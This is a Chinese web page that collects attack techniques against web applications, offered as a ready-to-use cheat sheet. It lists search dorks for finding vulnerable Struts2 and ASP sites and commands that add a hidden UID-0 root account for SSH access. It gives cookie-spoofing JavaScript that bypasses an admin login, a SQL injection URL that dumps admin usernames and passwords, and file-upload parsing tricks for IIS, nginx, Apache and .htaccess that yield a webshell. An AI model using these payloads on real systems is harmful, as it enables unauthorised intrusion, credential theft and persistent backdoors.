千家信息网

各种web程序漏洞

发表于:2024-11-26 作者:千家信息网编辑
千家信息网最后更新 2024年11月26日,收集整理的各种web漏洞struts2:Inurl:index.actionInurl:商城.actionInurl:index.action 标题:apache struts2Inurl:actio
千家信息网最后更新 2024年11月26日各种web程序漏洞


收集整理的各种web漏洞


struts2:

Inurl:index.action

Inurl:商城.action

Inurl:index.action 标题:apache struts2

Inurl:action?id=

site:.com inurl:index.action

inurl:dhis-web-commons


利用工具操作,账号密码添加:

useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0


账号:bingdao

密码:1



生成加密密码详情:

以下为生成加密密码命令(第一个1就是密码):

echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin


生成的加密密码:$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/


然后添加权限为root的账号和上面的密码:

useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/'


就得到了账号为"lengyu",密码为"1"的用户,然后再ssh上去


------------------------------------------------------

szwyadmin cookies欺骗:

inurl:szwyadmin/login.asp

inurl:szwyadmin

代码:

_javascript:alert([xss_clean]="adminuser="+escape("'or'='or'"));_javascript:alert([xss_clean]="adminpass="+escape("'or'='or'"));_javascript:alert([xss_clean]="admindj="+escape("1"));


代码复制然后回车。。~ 方便快捷。。然后关闭网页重新打开后台地址,然后在地址栏中将login.asp改为admin_index.asp 就直接进入后台了,这种方法成功率百分之80以上。


另外这套程序还有一个爆密码的oday。

使用方法很简单。直接填写域名然后点击爆密码。~~~ 直接射出管理员帐号密码。成功率不是很理想毕竟是很多的漏洞了.

-------------------------------------------------------------------------------------------------------------------------

南方数据:

inurl:HrDemand.asp

/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

admin/southidceditor/admin_style.asp

--------------------------------------------

爆库:


inurl:conn.asp


----------------

iis6 解析漏洞:

目录解析 /xx.asp/xx.jpg

说明:在网站下建立文件夹的名字为 .asp 或 .asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

文件解析 1.asp;.jpg

说明:会被服务器看成是1.asp还有IIS6.0 默认的可执行文件除了asp还包含这三种

/1.asa

/1.cer

/1.cdx


-----------------------------------

iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞:


Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…

在默认Fast-CGI开启状况下,黑阔上传一个名字为1.jpg,内容为

');?>

的文件,然后访问1.jpg/.php,在这个目录下就会生成一句话*** shell.php


------------------------------------------------------------------

Nginx <8.03 空字节代码执行漏洞:


影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg.php

来执行其中的代码


----------------
Apache 解析漏洞

Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如 wooyun.php.owf.rar ".owf"和".rar" 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

---------------------------------------------------

在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,***可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。


如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:

SetHandler application/x-httpd-php

然后再上传shell.jpg的***, 这样shell.jpg就可解析为php文件



0